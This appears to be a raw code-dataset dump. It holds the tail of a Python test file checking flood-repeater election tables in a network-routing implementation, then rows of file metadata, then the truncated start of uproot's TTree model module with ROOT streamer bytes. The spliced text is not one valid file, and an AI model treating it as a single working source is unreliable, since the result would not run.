}
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | False |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 1 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 2 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | False | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
#
# Configure redundancy 6 (not all grandparents can be covered at this redundancy)
#
additional_node_config = {"flooding_reduction_redundancy": 6}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Redundancy[| ]*6 "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
expected_parents = (
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| Interface | Parent | Parent | Grandparent | Similarity | Flood |\n"
"| Name | System ID | Interface | Count | Group | Repeater |\n"
"| | | Name | | | |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf18 | 18 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf13 | 13 | intf1 | 6 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf14 | 14 | intf1 | 8 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf17 | 17 | intf1 | 7 | 1: 8-6 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf11 | 11 | intf1 | 5 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf15 | 15 | intf1 | 4 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf12 | 12 | intf1 | 5 | 2: 5-4 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n"
"| intf16 | 16 | intf1 | 2 | 3: 2-2 | True |\n"
"+-----------+-----------+-----------+-------------+------------+----------+\n")
expected_grandparents = (
"+-------------+--------+-------------+-------------+\n"
"| Grandparent | Parent | Flood | Redundantly |\n"
"| System ID | Count | Repeater | Covered |\n"
"| | | Adjacencies | |\n"
"+-------------+--------+-------------+-------------+\n"
"| 21 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 22 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 23 | 3 | 3 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 24 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 25 | 5 | 5 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 26 | 6 | 6 | True |\n"
"+-------------+--------+-------------+-------------+\n"
"| 27 | 5 | 5 | False |\n"
"+-------------+--------+-------------+-------------+\n"
"| 28 | 7 | 7 | True |\n"
"+-------------+--------+-------------+-------------+\n")
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True (Pending) | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
def test_disable():
packet_common.add_missing_methods_to_thrift()
#
# Flooding reduction is enabled by default
#
parents = {}
test_node = make_test_node(parents)
expected_node_re = r"Flooding Reduction Enabled[| ]*True "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Disable flooding reduction
#
additional_node_config = {"flooding_reduction": False}
test_node = make_test_node(parents, additional_node_config)
expected_node_re = r"Flooding Reduction Enabled[| ]*False "
assert re.search(expected_node_re, test_node.cli_details_table().to_string())
#
# Topology (same as test_8x8_partial_connectivity_fully_redundant_coverage)
#
parents = {
# pylint:disable=bad-whitespace
11: [21, 22, 24, 25, 26 ],
12: [ 24, 25, 26, 27, 28],
13: [21, 22, 24, 26, 27, 28],
14: [21, 22, 23, 24, 25, 26, 27, 28],
15: [ 22, 24, 26, 28],
16: [21, 28],
17: [21, 22, 23, 25, 26, 27, 28],
18: [21, 22, 23, 24, 25, 27, 28]
}
expected_parents = None
expected_grandparents = None
expected_intfs = (
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| Interface | Neighbor | Neighbor | Neighbor | Neighbor | Neighbor is | This Node is |\n"
"| Name | Interface | System ID | State | Direction | Flood Repeater | Flood Repeater |\n"
"| | Name | | | | for This Node | for Neighbor |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf11 | intf1 | 11 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf12 | intf1 | 12 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf13 | intf1 | 13 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf14 | intf1 | 14 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf15 | intf1 | 15 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf16 | intf1 | 16 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf17 | intf1 | 17 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n"
"| intf18 | intf1 | 18 | THREE_WAY | North | True | Not Applicable |\n"
"+-----------+-----------+-----------+-----------+-----------+----------------+----------------+\n")
check_flood_repeater_election(parents, expected_parents, expected_grandparents, expected_intfs,
additional_node_config)
| 69.974465
| 109
| 0.295883
| 5,799
| 84,949
| 4.19762
| 0.05225
| 0.025142
| 0.061951
| 0.071481
| 0.83547
| 0.812464
| 0.787404
| 0.770602
| 0.741476
| 0.73215
| 0
| 0.043294
| 0.310728
| 84,949
| 1,213
| 110
| 70.032152
| 0.372432
| 0.039153
| 0
| 0.771429
| 0
| 0
| 0.710271
| 0.335218
| 0
| 0
| 0
| 0
| 0.021198
| 1
| 0.014747
| false
| 0.000922
| 0.008295
| 0
| 0.026728
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
e0ec972fd8efa9c2665967d8202b0e8e82382720
| 44,492
|
py
|
Python
|
src/uproot/models/TTree.py
|
veprbl/uproot4
|
85f219a36e76dffc18da4756227a7beb760657a0
|
[
"BSD-3-Clause"
] | 133
|
2020-05-08T21:34:11.000Z
|
2022-03-07T18:12:58.000Z
|
src/uproot/models/TTree.py
|
veprbl/uproot4
|
85f219a36e76dffc18da4756227a7beb760657a0
|
[
"BSD-3-Clause"
] | 269
|
2020-05-13T02:42:24.000Z
|
2022-03-24T20:24:16.000Z
|
src/uproot/models/TTree.py
|
veprbl/uproot4
|
85f219a36e76dffc18da4756227a7beb760657a0
|
[
"BSD-3-Clause"
] | 45
|
2020-05-15T17:48:04.000Z
|
2022-03-18T19:23:07.000Z
|
# BSD 3-Clause License; see https://github.com/scikit-hep/uproot4/blob/main/LICENSE
"""
This module defines versioned models for ``TTree``.
See :doc:`uproot.behaviors.TBranch` for definitions of ``TTree``-reading
functions.
"""
from __future__ import absolute_import
import struct
import numpy
import uproot
import uproot.behaviors.TTree
import uproot.models.TBranch
_ttree16_format1 = struct.Struct(">qqqqdiiiqqqqq")
_rawstreamer_TBranchRef_v1 = (
None,
b"@\x00\x01m\xff\xff\xff\xffTStreamerInfo\x00@\x00\x01W\x00\t@\x00\x00\x18\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\nTBranchRef\x00#`\xb3\xfd\x00\x00\x00\x01@\x00\x01-\xff\xff\xff\xffTObjArray\x00@\x00\x01\x1b\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TBranch\x11Branch descriptor\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x97\x8a\xac\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\r@\x00\x00\x89\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00j\x00\x02@\x00\x00d\x00\x04@\x00\x00/\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfRefTable\x18pointer to the TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTRefTable*\x00",
"TBranchRef",
1,
)
_rawstreamer_TRefTable_v3 = (
None,
b"@\x00\x03P\xff\xff\xff\xffTStreamerInfo\x00@\x00\x03:\x00\t@\x00\x00\x17\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\tTRefTable\x00\x8c\x89[\x85\x00\x00\x00\x03@\x00\x03\x11\xff\xff\xff\xffTObjArray\x00@\x00\x02\xff\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00\x00@\x00\x00u\xff\xff\xff\xffTStreamerBase\x00@\x00\x00_\x00\x03@\x00\x00U\x00\x04@\x00\x00&\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07TObject\x11Basic ROOT object\x00\x00\x00B\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\x1b\xc0-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00\x82\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x05fSize dummy for backward compatibility\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xb9\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00\x9a\x00\x02@\x00\x00\x94\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fParentsIarray of Parent objects (eg TTree branch) holding the referenced objects\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\nTObjArray*@\x00\x00\x88\xff\xff\xff\xffTStreamerObjectPointer\x00@\x00\x00i\x00\x02@\x00\x00c\x00\x04@\x00\x000\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06fOwner\x1cObject owning this TRefTable\x00\x00\x00@\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08TObject*@\x00\x00\x9e\xff\xff\xff\xffTStreamerSTL\x00@\x00\x00\x89\x00\x03@\x00\x00{\x00\x04@\x00\x00B\x00\x01\x00\x01\x00\x00\x00\x00\x02\x00\x00\x00\rfProcessGUIDs'UUIDs of TProcessIDs used in fParentIDs\x00\x00\x01\xf4\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0evector<string>\x00\x00\x00\x01\x00\x00\x00=\x00",
"TRefTable",
3,
)
_rawstreamer_TTree_v20 = (
None,
b"@\x00\x14q\xff\xff\xff\xffTStreamerInfo\x00@\x00\x14[\x00\t@\x00\x00\x13\x00\x01\x00\x01\x00\x00\x00\x00\x03\x01\x00\x00\x05TTree\x00rd\xe0\x7f\x00\x00\x00\x14@\x00\x146\xff\xff\xff\xffTObjArray\x00@\x00\x14$\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00!\x00\x00\x00\x00@\x00\x00\x8d\xff\xff\xff\xffTStreamerBase\x00@\x00\x00w\x00\x03@\x00\x00m\x00\x04@\x00\x00>\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x06TNamed*The basis for a named object (name, title)\x00\x00\x00C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xdf\xb7J<\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x01@\x00\x00t\xff\xff\xff\xffTStreamerBase\x00@\x00\x00^\x00\x03@\x00\x00T\x00\x04@\x00\x00%\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttLine\x0fLine attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x94\x07EI\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00y\xff\xff\xff\xffTStreamerBase\x00@\x00\x00c\x00\x03@\x00\x00Y\x00\x04@\x00\x00*\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08TAttFill\x14Fill area attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xd9*\x92\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00x\xff\xff\xff\xffTStreamerBase\x00@\x00\x00b\x00\x03@\x00\x00X\x00\x04@\x00\x00)\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nTAttMarker\x11Marker attributes\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00)\x1d\x8b\xec\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04BASE\x00\x00\x00\x02@\x00\x00{\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00`\x00\x02@\x00\x00Z\x00\x04@\x00\x00'\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x08fEntries\x11Number of entries\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xa3\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x88\x00\x02@\x00\x00\x82\x00\x04@\x00\x00O\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfTotBytes8Total number of bytes in all branches before compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xa2\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfZipBytes7Total number of bytes in all branches after compression\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x86\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00k\x00\x02@\x00\x00e\x00\x04@\x00\x002\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfSavedBytes\x19Number of autosaved bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x8b\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00p\x00\x02@\x00\x00j\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfFlushedBytes\x1cNumber of auto-flushed bytes\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x89\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x007\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fWeight\"Tree weight (see TTree::SetWeight)\x00\x00\x00\x08\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06double@\x00\x00\x89\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00n\x00\x02@\x00\x00h\x00\x04@\x00\x00:\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efTimerInterval\x1eTimer interval in milliseconds\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x8e\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00s\x00\x02@\x00\x00m\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfScanField'Number of runs before prompting in Scan\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\x82\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00g\x00\x02@\x00\x00a\x00\x04@\x00\x003\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x07fUpdate\x1eUpdate frequency for EntryLoop\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xad\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x92\x00\x02@\x00\x00\x8c\x00\x04@\x00\x00^\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x16fDefaultEntryOffsetLen:Initial Length of fEntryOffset table in the basket buffers\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xb0\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x95\x00\x02@\x00\x00\x8f\x00\x04@\x00\x00a\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0efNClusterRangeENumber of Cluster range in addition to the one defined by 'AutoFlush'\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03int@\x00\x00\xa2\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x87\x00\x02@\x00\x00\x81\x00\x04@\x00\x00N\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfMaxEntries5Maximum number of entries in case of circular buffers\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x93\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00x\x00\x02@\x00\x00r\x00\x04@\x00\x00?\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\rfMaxEntryLoop$Maximum number of entries to process\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x9d\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\x82\x00\x02@\x00\x00|\x00\x04@\x00\x00I\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0ffMaxVirtualSize,Maximum total size of buffers kept in memory\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xc1\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\xa6\x00\x02@\x00\x00\xa0\x00\x04@\x00\x00m\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfAutoSaveVAutosave tree when fAutoSave entries written or -fAutoSave (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xc6\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00\xab\x00\x02@\x00\x00\xa5\x00\x04@\x00\x00r\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\nfAutoFlushZAuto-flush tree when fAutoFlush entries written or -fAutoFlush (compressed) bytes produced\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\x99\xff\xff\xff\xffTStreamerBasicType\x00@\x00\x00~\x00\x02@\x00\x00x\x00\x04@\x00\x00E\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\tfEstimate.Number of entries to estimate histogram limits\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08Long64_t@\x00\x00\xbe\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00\xa0\x00\x02@\x00\x00\x81\x00\x04@\x00\x00M\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x10fClusterRangeEnd/[fNClusterRange] Last entry of a cluster range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xd0\xff\xff\xff\xffTStreamerBasicPointer\x00@\x00\x00\xb2\x00\x02@\x00\x00\x93\x00\x04@\x00\x00_\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0cfClusterSizeE[fNClusterRange] Number of entries in each cluster for a given range.\x00\x00\x008\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\tLong64_t*\x00\x00\x00\x14\x0efNClusterRange\x05TTree@\x00\x00\xb3\xff\xff\xff\xffTStreamerObjectAny\x00@\x00\x00\x98\x00\x02@\x00\x00\x92\x00\x04@\x00\x00V\x00\x01\x00\x01\x00\x00\x00\x00\x03\x00\x00\x00\x0bfIOFeatures=IO features to define for newly-written baskets and 